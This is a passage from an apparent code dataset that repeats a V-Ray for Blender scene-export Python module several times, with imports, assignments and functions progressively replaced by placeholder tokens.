o.setPreview(engine.is_preview)\n\n if not rtExporter:\n bus['exporter'] = exp_init.InitExporter(bus)\n\n try:\n # We do everything here basically because we want to close files\n # if smth goes wrong...\n if not rtExporter:\n err = Export(bus, scene, engine, engine.is_preview)\n else:\n if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:\n o.setAnimation(True)\n o.setFrameStart(scene.frame_start)\n o.setFrameEnd(scene.frame_end)\n o.setFrameStep(scene.frame_step)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n cameraCount = len([1 for o in scene.objects if o.type == 'CAMERA' and o.data.vray.use_camera_loop])\n o.setAnimation(True)\n o.setFrameStart(1)\n o.setFrameEnd(cameraCount)\n o.setFrameStep(1)\n\n init = {\n 'context' : bpy.context.as_pointer(),\n 'engine' : engine.as_pointer(),\n 'data' : bpy.data.as_pointer(),\n 'scene' : scene.as_pointer(),\n 'mainFile' : fm.getFilePathByPluginType('MAIN'),\n 'objectFile' : fm.getFilePathByPluginType('OBJECT'),\n 'envFile' : fm.getFilePathByPluginType('WORLD'),\n 'geometryFile' : fm.getFilePathByPluginType('GEOMETRY'),\n 'lightsFile' : fm.getFilePathByPluginType('LIGHT'),\n 'materialFile' : fm.getFilePathByPluginType('MATERIAL'),\n 'textureFile' : fm.getFilePathByPluginType('TEXTURE'),\n 'cameraFile' : fm.getFilePathByPluginType('CAMERA'),\n }\n\n # Free anything we have\n if engine.renderer:\n del engine.renderer\n\n renderer = _vray_for_blender_rt.init(**init)\n if renderer:\n setattr(engine, 'renderer', renderer)\n _vray_for_blender_rt.render(renderer)\n\n except Exception as e:\n debug.ExceptionInfo(e)\n err = str(e)\n finally:\n exp_init.ShutdownExporter(bus)\n\n return err\n\n\ndef ExportAndRun(engine, scene):\n if engine.test_break():\n return \"Export is interrupted!\"\n\n VRayScene = scene.vray\n\n o = VRayPluginExporter()\n\n bus = {\n 'output' : o,\n\n 'engine' : engine,\n 'scene' : scene,\n 'camera' : scene.camera,\n\n 'skipObjects' : set(),\n 'environment_volume' : set(),\n 'gizmos' : set(),\n\n 'preview' : engine.is_preview,\n\n # Used to pass nodes into plugin exporter\n # to access some special data like \"fake\" textures\n 'context' : {\n 'node' : None,\n },\n\n 'cache' : {\n 'plugins' : set(),\n 'mesh' : set(),\n },\n\n 'defaults' : {\n 'brdf' : \"BRDFNOBRDFISSET\",\n 'material' : \"MANOMATERIALISSET\",\n 'texture' : \"TENOTEXTUREIESSET\",\n 'uvwgen' : \"DEFAULTUVWC\",\n 'blend' : \"TEDefaultBlend\",\n },\n }\n\n if bus['camera'].type != 'CAMERA':\n return \"Scene's active camera is not of type camera\"\n\n err = ExportEx(bus)\n if err is not None:\n return err\n\n err = exp_run.RunEx(bus)\n if err is not None:\n return err\n\n return None\n\n\n# First check the animation type:\n#\n# 'FRAMEBYFRAME' \"Export and render frame by frame\"\n# 'FULL' \"Export full animation range then render\"\n# 'NOTMESHES' \"Export full animation range without meshes\"\n# 'CAMERA' \"Export full animation of camera motion\"\n#\n# 'FRAMEBYFRAME' should also support exporting of 2 (or more) frames at once for correct motion blur\n#\ndef RenderScene(engine, scene):\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n\n err = None\n\n if VRayExporter.animation_mode == 'FRAMEBYFRAME':\n # Store current frame\n selected_frame = scene.frame_current\n\n f = scene.frame_start\n while(f <= scene.frame_end):\n scene.frame_set(f)\n\n err = ExportAndRun(engine, scene)\n if err is not None:\n break\n\n f += scene.frame_step\n\n # Restore selected frame\n scene.frame_set(selected_frame)\n\n else:\n err = ExportAndRun(engine, scene)\n\n return err\n",
"import os\nimport time\nimport datetime\nimport bpy\nfrom vb30.lib.VRayStream import VRayExportFiles\nfrom vb30.lib.VRayStream import VRayPluginExporter\nfrom vb30.lib.VRayStream import VRayFilePaths\nfrom vb30.lib import SysUtils, BlenderUtils\nfrom vb30.nodes import export as NodesExport\nfrom vb30.exporting import exp_init\nfrom vb30.exporting import exp_settings\nfrom vb30.exporting import exp_channels\nfrom vb30.exporting import exp_frame\nfrom vb30.exporting import exp_run\nfrom vb30.exporting import exp_anim_full\nfrom vb30.exporting import exp_anim_camera_loop\nfrom vb30 import debug\nHAS_VB35 = SysUtils.hasRtExporter()\nif HAS_VB35:\n import _vray_for_blender_rt\n\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n ts = time.time()\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('defaults.vrscene'))\n if VRayExporter.draft:\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('draft.vrscene'))\n exp_channels.ExportRenderElements(bus)\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n else:\n err = exp_anim_full.ExportAnimation(bus, scene.frame_start, scene.\n frame_end, scene.frame_step)\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', '\\n// Include additional *.vrscene files')\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath,\n includeFile.name))\n o.write('MAIN', '\\n')\n o.setAnimation(False)\n exp_settings.ExportSettings(bus)\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1, 1, 1) + td\n if not bus['preview']:\n debug.PrintMsg('Export done [%.2i:%.2i:%.2i]' % (d.hour, d.minute,\n d.second))\n return err\n\n\ndef ExportEx(bus):\n debug.Debug('ExportEx()')\n err = None\n scene = bus['scene']\n engine = bus['engine']\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n pm = VRayFilePaths()\n pm.setSeparateFiles(VRayExporter.useSeparateFiles)\n pm.initFromScene(engine, scene)\n pm.printInfo()\n fm = VRayExportFiles(pm)\n fm.setOverwriteGeometry(VRayExporter.auto_meshes)\n rtExporter = HAS_VB35 and engine.bl_idname == 'VRAY_RENDER_RT'\n try:\n fm.init(not rtExporter)\n except Exception as e:\n debug.ExceptionInfo(e)\n return 'Error initing files!'\n o.setFileManager(fm)\n o.setPreview(engine.is_preview)\n if not rtExporter:\n bus['exporter'] = exp_init.InitExporter(bus)\n try:\n if not rtExporter:\n err = Export(bus, scene, engine, engine.is_preview)\n else:\n if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:\n o.setAnimation(True)\n o.setFrameStart(scene.frame_start)\n o.setFrameEnd(scene.frame_end)\n o.setFrameStep(scene.frame_step)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n cameraCount = len([(1) for o in scene.objects if o.type ==\n 'CAMERA' and o.data.vray.use_camera_loop])\n o.setAnimation(True)\n o.setFrameStart(1)\n o.setFrameEnd(cameraCount)\n o.setFrameStep(1)\n init = {'context': bpy.context.as_pointer(), 'engine': engine.\n as_pointer(), 'data': bpy.data.as_pointer(), 'scene': scene\n .as_pointer(), 'mainFile': fm.getFilePathByPluginType(\n 'MAIN'), 'objectFile': fm.getFilePathByPluginType('OBJECT'),\n 'envFile': fm.getFilePathByPluginType('WORLD'),\n 'geometryFile': fm.getFilePathByPluginType('GEOMETRY'),\n 'lightsFile': fm.getFilePathByPluginType('LIGHT'),\n 'materialFile': fm.getFilePathByPluginType('MATERIAL'),\n 'textureFile': fm.getFilePathByPluginType('TEXTURE'),\n 'cameraFile': fm.getFilePathByPluginType('CAMERA')}\n if engine.renderer:\n del engine.renderer\n renderer = _vray_for_blender_rt.init(**init)\n if renderer:\n setattr(engine, 'renderer', renderer)\n _vray_for_blender_rt.render(renderer)\n except Exception as e:\n debug.ExceptionInfo(e)\n err = str(e)\n finally:\n exp_init.ShutdownExporter(bus)\n return err\n\n\ndef ExportAndRun(engine, scene):\n if engine.test_break():\n return 'Export is interrupted!'\n VRayScene = scene.vray\n o = VRayPluginExporter()\n bus = {'output': o, 'engine': engine, 'scene': scene, 'camera': scene.\n camera, 'skipObjects': set(), 'environment_volume': set(), 'gizmos':\n set(), 'preview': engine.is_preview, 'context': {'node': None},\n 'cache': {'plugins': set(), 'mesh': set()}, 'defaults': {'brdf':\n 'BRDFNOBRDFISSET', 'material': 'MANOMATERIALISSET', 'texture':\n 'TENOTEXTUREIESSET', 'uvwgen': 'DEFAULTUVWC', 'blend':\n 'TEDefaultBlend'}}\n if bus['camera'].type != 'CAMERA':\n return \"Scene's active camera is not of type camera\"\n err = ExportEx(bus)\n if err is not None:\n return err\n err = exp_run.RunEx(bus)\n if err is not None:\n return err\n return None\n\n\ndef RenderScene(engine, scene):\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n err = None\n if VRayExporter.animation_mode == 'FRAMEBYFRAME':\n selected_frame = scene.frame_current\n f = scene.frame_start\n while f <= scene.frame_end:\n scene.frame_set(f)\n err = ExportAndRun(engine, scene)\n if err is not None:\n break\n f += scene.frame_step\n scene.frame_set(selected_frame)\n else:\n err = ExportAndRun(engine, scene)\n return err\n",
"<import token>\nHAS_VB35 = SysUtils.hasRtExporter()\nif HAS_VB35:\n import _vray_for_blender_rt\n\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n ts = time.time()\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('defaults.vrscene'))\n if VRayExporter.draft:\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('draft.vrscene'))\n exp_channels.ExportRenderElements(bus)\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n else:\n err = exp_anim_full.ExportAnimation(bus, scene.frame_start, scene.\n frame_end, scene.frame_step)\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', '\\n// Include additional *.vrscene files')\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath,\n includeFile.name))\n o.write('MAIN', '\\n')\n o.setAnimation(False)\n exp_settings.ExportSettings(bus)\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1, 1, 1) + td\n if not bus['preview']:\n debug.PrintMsg('Export done [%.2i:%.2i:%.2i]' % (d.hour, d.minute,\n d.second))\n return err\n\n\ndef ExportEx(bus):\n debug.Debug('ExportEx()')\n err = None\n scene = bus['scene']\n engine = bus['engine']\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n pm = VRayFilePaths()\n pm.setSeparateFiles(VRayExporter.useSeparateFiles)\n pm.initFromScene(engine, scene)\n pm.printInfo()\n fm = VRayExportFiles(pm)\n fm.setOverwriteGeometry(VRayExporter.auto_meshes)\n rtExporter = HAS_VB35 and engine.bl_idname == 'VRAY_RENDER_RT'\n try:\n fm.init(not rtExporter)\n except Exception as e:\n debug.ExceptionInfo(e)\n return 'Error initing files!'\n o.setFileManager(fm)\n o.setPreview(engine.is_preview)\n if not rtExporter:\n bus['exporter'] = exp_init.InitExporter(bus)\n try:\n if not rtExporter:\n err = Export(bus, scene, engine, engine.is_preview)\n else:\n if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:\n o.setAnimation(True)\n o.setFrameStart(scene.frame_start)\n o.setFrameEnd(scene.frame_end)\n o.setFrameStep(scene.frame_step)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n cameraCount = len([(1) for o in scene.objects if o.type ==\n 'CAMERA' and o.data.vray.use_camera_loop])\n o.setAnimation(True)\n o.setFrameStart(1)\n o.setFrameEnd(cameraCount)\n o.setFrameStep(1)\n init = {'context': bpy.context.as_pointer(), 'engine': engine.\n as_pointer(), 'data': bpy.data.as_pointer(), 'scene': scene\n .as_pointer(), 'mainFile': fm.getFilePathByPluginType(\n 'MAIN'), 'objectFile': fm.getFilePathByPluginType('OBJECT'),\n 'envFile': fm.getFilePathByPluginType('WORLD'),\n 'geometryFile': fm.getFilePathByPluginType('GEOMETRY'),\n 'lightsFile': fm.getFilePathByPluginType('LIGHT'),\n 'materialFile': fm.getFilePathByPluginType('MATERIAL'),\n 'textureFile': fm.getFilePathByPluginType('TEXTURE'),\n 'cameraFile': fm.getFilePathByPluginType('CAMERA')}\n if engine.renderer:\n del engine.renderer\n renderer = _vray_for_blender_rt.init(**init)\n if renderer:\n setattr(engine, 'renderer', renderer)\n _vray_for_blender_rt.render(renderer)\n except Exception as e:\n debug.ExceptionInfo(e)\n err = str(e)\n finally:\n exp_init.ShutdownExporter(bus)\n return err\n\n\ndef ExportAndRun(engine, scene):\n if engine.test_break():\n return 'Export is interrupted!'\n VRayScene = scene.vray\n o = VRayPluginExporter()\n bus = {'output': o, 'engine': engine, 'scene': scene, 'camera': scene.\n camera, 'skipObjects': set(), 'environment_volume': set(), 'gizmos':\n set(), 'preview': engine.is_preview, 'context': {'node': None},\n 'cache': {'plugins': set(), 'mesh': set()}, 'defaults': {'brdf':\n 'BRDFNOBRDFISSET', 'material': 'MANOMATERIALISSET', 'texture':\n 'TENOTEXTUREIESSET', 'uvwgen': 'DEFAULTUVWC', 'blend':\n 'TEDefaultBlend'}}\n if bus['camera'].type != 'CAMERA':\n return \"Scene's active camera is not of type camera\"\n err = ExportEx(bus)\n if err is not None:\n return err\n err = exp_run.RunEx(bus)\n if err is not None:\n return err\n return None\n\n\ndef RenderScene(engine, scene):\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n err = None\n if VRayExporter.animation_mode == 'FRAMEBYFRAME':\n selected_frame = scene.frame_current\n f = scene.frame_start\n while f <= scene.frame_end:\n scene.frame_set(f)\n err = ExportAndRun(engine, scene)\n if err is not None:\n break\n f += scene.frame_step\n scene.frame_set(selected_frame)\n else:\n err = ExportAndRun(engine, scene)\n return err\n",
"<import token>\n<assignment token>\nif HAS_VB35:\n import _vray_for_blender_rt\n\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n ts = time.time()\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('defaults.vrscene'))\n if VRayExporter.draft:\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('draft.vrscene'))\n exp_channels.ExportRenderElements(bus)\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n else:\n err = exp_anim_full.ExportAnimation(bus, scene.frame_start, scene.\n frame_end, scene.frame_step)\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', '\\n// Include additional *.vrscene files')\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath,\n includeFile.name))\n o.write('MAIN', '\\n')\n o.setAnimation(False)\n exp_settings.ExportSettings(bus)\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1, 1, 1) + td\n if not bus['preview']:\n debug.PrintMsg('Export done [%.2i:%.2i:%.2i]' % (d.hour, d.minute,\n d.second))\n return err\n\n\ndef ExportEx(bus):\n debug.Debug('ExportEx()')\n err = None\n scene = bus['scene']\n engine = bus['engine']\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n pm = VRayFilePaths()\n pm.setSeparateFiles(VRayExporter.useSeparateFiles)\n pm.initFromScene(engine, scene)\n pm.printInfo()\n fm = VRayExportFiles(pm)\n fm.setOverwriteGeometry(VRayExporter.auto_meshes)\n rtExporter = HAS_VB35 and engine.bl_idname == 'VRAY_RENDER_RT'\n try:\n fm.init(not rtExporter)\n except Exception as e:\n debug.ExceptionInfo(e)\n return 'Error initing files!'\n o.setFileManager(fm)\n o.setPreview(engine.is_preview)\n if not rtExporter:\n bus['exporter'] = exp_init.InitExporter(bus)\n try:\n if not rtExporter:\n err = Export(bus, scene, engine, engine.is_preview)\n else:\n if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:\n o.setAnimation(True)\n o.setFrameStart(scene.frame_start)\n o.setFrameEnd(scene.frame_end)\n o.setFrameStep(scene.frame_step)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n cameraCount = len([(1) for o in scene.objects if o.type ==\n 'CAMERA' and o.data.vray.use_camera_loop])\n o.setAnimation(True)\n o.setFrameStart(1)\n o.setFrameEnd(cameraCount)\n o.setFrameStep(1)\n init = {'context': bpy.context.as_pointer(), 'engine': engine.\n as_pointer(), 'data': bpy.data.as_pointer(), 'scene': scene\n .as_pointer(), 'mainFile': fm.getFilePathByPluginType(\n 'MAIN'), 'objectFile': fm.getFilePathByPluginType('OBJECT'),\n 'envFile': fm.getFilePathByPluginType('WORLD'),\n 'geometryFile': fm.getFilePathByPluginType('GEOMETRY'),\n 'lightsFile': fm.getFilePathByPluginType('LIGHT'),\n 'materialFile': fm.getFilePathByPluginType('MATERIAL'),\n 'textureFile': fm.getFilePathByPluginType('TEXTURE'),\n 'cameraFile': fm.getFilePathByPluginType('CAMERA')}\n if engine.renderer:\n del engine.renderer\n renderer = _vray_for_blender_rt.init(**init)\n if renderer:\n setattr(engine, 'renderer', renderer)\n _vray_for_blender_rt.render(renderer)\n except Exception as e:\n debug.ExceptionInfo(e)\n err = str(e)\n finally:\n exp_init.ShutdownExporter(bus)\n return err\n\n\ndef ExportAndRun(engine, scene):\n if engine.test_break():\n return 'Export is interrupted!'\n VRayScene = scene.vray\n o = VRayPluginExporter()\n bus = {'output': o, 'engine': engine, 'scene': scene, 'camera': scene.\n camera, 'skipObjects': set(), 'environment_volume': set(), 'gizmos':\n set(), 'preview': engine.is_preview, 'context': {'node': None},\n 'cache': {'plugins': set(), 'mesh': set()}, 'defaults': {'brdf':\n 'BRDFNOBRDFISSET', 'material': 'MANOMATERIALISSET', 'texture':\n 'TENOTEXTUREIESSET', 'uvwgen': 'DEFAULTUVWC', 'blend':\n 'TEDefaultBlend'}}\n if bus['camera'].type != 'CAMERA':\n return \"Scene's active camera is not of type camera\"\n err = ExportEx(bus)\n if err is not None:\n return err\n err = exp_run.RunEx(bus)\n if err is not None:\n return err\n return None\n\n\ndef RenderScene(engine, scene):\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n err = None\n if VRayExporter.animation_mode == 'FRAMEBYFRAME':\n selected_frame = scene.frame_current\n f = scene.frame_start\n while f <= scene.frame_end:\n scene.frame_set(f)\n err = ExportAndRun(engine, scene)\n if err is not None:\n break\n f += scene.frame_step\n scene.frame_set(selected_frame)\n else:\n err = ExportAndRun(engine, scene)\n return err\n",
"<import token>\n<assignment token>\n<code token>\n\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n ts = time.time()\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('defaults.vrscene'))\n if VRayExporter.draft:\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('draft.vrscene'))\n exp_channels.ExportRenderElements(bus)\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n else:\n err = exp_anim_full.ExportAnimation(bus, scene.frame_start, scene.\n frame_end, scene.frame_step)\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', '\\n// Include additional *.vrscene files')\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath,\n includeFile.name))\n o.write('MAIN', '\\n')\n o.setAnimation(False)\n exp_settings.ExportSettings(bus)\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1, 1, 1) + td\n if not bus['preview']:\n debug.PrintMsg('Export done [%.2i:%.2i:%.2i]' % (d.hour, d.minute,\n d.second))\n return err\n\n\ndef ExportEx(bus):\n debug.Debug('ExportEx()')\n err = None\n scene = bus['scene']\n engine = bus['engine']\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n pm = VRayFilePaths()\n pm.setSeparateFiles(VRayExporter.useSeparateFiles)\n pm.initFromScene(engine, scene)\n pm.printInfo()\n fm = VRayExportFiles(pm)\n fm.setOverwriteGeometry(VRayExporter.auto_meshes)\n rtExporter = HAS_VB35 and engine.bl_idname == 'VRAY_RENDER_RT'\n try:\n fm.init(not rtExporter)\n except Exception as e:\n debug.ExceptionInfo(e)\n return 'Error initing files!'\n o.setFileManager(fm)\n o.setPreview(engine.is_preview)\n if not rtExporter:\n bus['exporter'] = exp_init.InitExporter(bus)\n try:\n if not rtExporter:\n err = Export(bus, scene, engine, engine.is_preview)\n else:\n if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:\n o.setAnimation(True)\n o.setFrameStart(scene.frame_start)\n o.setFrameEnd(scene.frame_end)\n o.setFrameStep(scene.frame_step)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n cameraCount = len([(1) for o in scene.objects if o.type ==\n 'CAMERA' and o.data.vray.use_camera_loop])\n o.setAnimation(True)\n o.setFrameStart(1)\n o.setFrameEnd(cameraCount)\n o.setFrameStep(1)\n init = {'context': bpy.context.as_pointer(), 'engine': engine.\n as_pointer(), 'data': bpy.data.as_pointer(), 'scene': scene\n .as_pointer(), 'mainFile': fm.getFilePathByPluginType(\n 'MAIN'), 'objectFile': fm.getFilePathByPluginType('OBJECT'),\n 'envFile': fm.getFilePathByPluginType('WORLD'),\n 'geometryFile': fm.getFilePathByPluginType('GEOMETRY'),\n 'lightsFile': fm.getFilePathByPluginType('LIGHT'),\n 'materialFile': fm.getFilePathByPluginType('MATERIAL'),\n 'textureFile': fm.getFilePathByPluginType('TEXTURE'),\n 'cameraFile': fm.getFilePathByPluginType('CAMERA')}\n if engine.renderer:\n del engine.renderer\n renderer = _vray_for_blender_rt.init(**init)\n if renderer:\n setattr(engine, 'renderer', renderer)\n _vray_for_blender_rt.render(renderer)\n except Exception as e:\n debug.ExceptionInfo(e)\n err = str(e)\n finally:\n exp_init.ShutdownExporter(bus)\n return err\n\n\ndef ExportAndRun(engine, scene):\n if engine.test_break():\n return 'Export is interrupted!'\n VRayScene = scene.vray\n o = VRayPluginExporter()\n bus = {'output': o, 'engine': engine, 'scene': scene, 'camera': scene.\n camera, 'skipObjects': set(), 'environment_volume': set(), 'gizmos':\n set(), 'preview': engine.is_preview, 'context': {'node': None},\n 'cache': {'plugins': set(), 'mesh': set()}, 'defaults': {'brdf':\n 'BRDFNOBRDFISSET', 'material': 'MANOMATERIALISSET', 'texture':\n 'TENOTEXTUREIESSET', 'uvwgen': 'DEFAULTUVWC', 'blend':\n 'TEDefaultBlend'}}\n if bus['camera'].type != 'CAMERA':\n return \"Scene's active camera is not of type camera\"\n err = ExportEx(bus)\n if err is not None:\n return err\n err = exp_run.RunEx(bus)\n if err is not None:\n return err\n return None\n\n\ndef RenderScene(engine, scene):\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n err = None\n if VRayExporter.animation_mode == 'FRAMEBYFRAME':\n selected_frame = scene.frame_current\n f = scene.frame_start\n while f <= scene.frame_end:\n scene.frame_set(f)\n err = ExportAndRun(engine, scene)\n if err is not None:\n break\n f += scene.frame_step\n scene.frame_set(selected_frame)\n else:\n err = ExportAndRun(engine, scene)\n return err\n",
"<import token>\n<assignment token>\n<code token>\n\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n ts = time.time()\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('defaults.vrscene'))\n if VRayExporter.draft:\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('draft.vrscene'))\n exp_channels.ExportRenderElements(bus)\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n else:\n err = exp_anim_full.ExportAnimation(bus, scene.frame_start, scene.\n frame_end, scene.frame_step)\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', '\\n// Include additional *.vrscene files')\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath,\n includeFile.name))\n o.write('MAIN', '\\n')\n o.setAnimation(False)\n exp_settings.ExportSettings(bus)\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1, 1, 1) + td\n if not bus['preview']:\n debug.PrintMsg('Export done [%.2i:%.2i:%.2i]' % (d.hour, d.minute,\n d.second))\n return err\n\n\ndef ExportEx(bus):\n debug.Debug('ExportEx()')\n err = None\n scene = bus['scene']\n engine = bus['engine']\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n pm = VRayFilePaths()\n pm.setSeparateFiles(VRayExporter.useSeparateFiles)\n pm.initFromScene(engine, scene)\n pm.printInfo()\n fm = VRayExportFiles(pm)\n fm.setOverwriteGeometry(VRayExporter.auto_meshes)\n rtExporter = HAS_VB35 and engine.bl_idname == 'VRAY_RENDER_RT'\n try:\n fm.init(not rtExporter)\n except Exception as e:\n debug.ExceptionInfo(e)\n return 'Error initing files!'\n o.setFileManager(fm)\n o.setPreview(engine.is_preview)\n if not rtExporter:\n bus['exporter'] = exp_init.InitExporter(bus)\n try:\n if not rtExporter:\n err = Export(bus, scene, engine, engine.is_preview)\n else:\n if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:\n o.setAnimation(True)\n o.setFrameStart(scene.frame_start)\n o.setFrameEnd(scene.frame_end)\n o.setFrameStep(scene.frame_step)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n cameraCount = len([(1) for o in scene.objects if o.type ==\n 'CAMERA' and o.data.vray.use_camera_loop])\n o.setAnimation(True)\n o.setFrameStart(1)\n o.setFrameEnd(cameraCount)\n o.setFrameStep(1)\n init = {'context': bpy.context.as_pointer(), 'engine': engine.\n as_pointer(), 'data': bpy.data.as_pointer(), 'scene': scene\n .as_pointer(), 'mainFile': fm.getFilePathByPluginType(\n 'MAIN'), 'objectFile': fm.getFilePathByPluginType('OBJECT'),\n 'envFile': fm.getFilePathByPluginType('WORLD'),\n 'geometryFile': fm.getFilePathByPluginType('GEOMETRY'),\n 'lightsFile': fm.getFilePathByPluginType('LIGHT'),\n 'materialFile': fm.getFilePathByPluginType('MATERIAL'),\n 'textureFile': fm.getFilePathByPluginType('TEXTURE'),\n 'cameraFile': fm.getFilePathByPluginType('CAMERA')}\n if engine.renderer:\n del engine.renderer\n renderer = _vray_for_blender_rt.init(**init)\n if renderer:\n setattr(engine, 'renderer', renderer)\n _vray_for_blender_rt.render(renderer)\n except Exception as e:\n debug.ExceptionInfo(e)\n err = str(e)\n finally:\n exp_init.ShutdownExporter(bus)\n return err\n\n\n<function token>\n\n\ndef RenderScene(engine, scene):\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n err = None\n if VRayExporter.animation_mode == 'FRAMEBYFRAME':\n selected_frame = scene.frame_current\n f = scene.frame_start\n while f <= scene.frame_end:\n scene.frame_set(f)\n err = ExportAndRun(engine, scene)\n if err is not None:\n break\n f += scene.frame_step\n scene.frame_set(selected_frame)\n else:\n err = ExportAndRun(engine, scene)\n return err\n",
"<import token>\n<assignment token>\n<code token>\n\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n ts = time.time()\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('defaults.vrscene'))\n if VRayExporter.draft:\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('draft.vrscene'))\n exp_channels.ExportRenderElements(bus)\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n else:\n err = exp_anim_full.ExportAnimation(bus, scene.frame_start, scene.\n frame_end, scene.frame_step)\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', '\\n// Include additional *.vrscene files')\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath,\n includeFile.name))\n o.write('MAIN', '\\n')\n o.setAnimation(False)\n 